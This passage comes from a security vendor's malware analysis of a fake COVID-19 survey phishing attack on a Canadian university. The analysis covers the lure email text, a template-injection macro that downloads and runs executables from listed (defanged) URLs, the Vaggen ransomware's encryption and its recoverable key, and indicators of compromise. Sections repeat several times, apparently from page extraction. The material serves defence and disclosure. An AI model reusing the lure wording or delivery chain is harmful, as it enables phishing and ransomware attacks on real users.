event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3319 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3320 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3321 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3322 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3323 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3324 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3325 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3326 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3327 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3328 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3329 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3330 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3331 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3332 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3333 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3334 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3335 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3336 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3337 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3338 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3339 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3340 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3341 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3342 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3343 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3344 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3345 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3346 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3347 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3348 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3349 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3350 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3351 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3352 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3353 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3354 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3355 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these 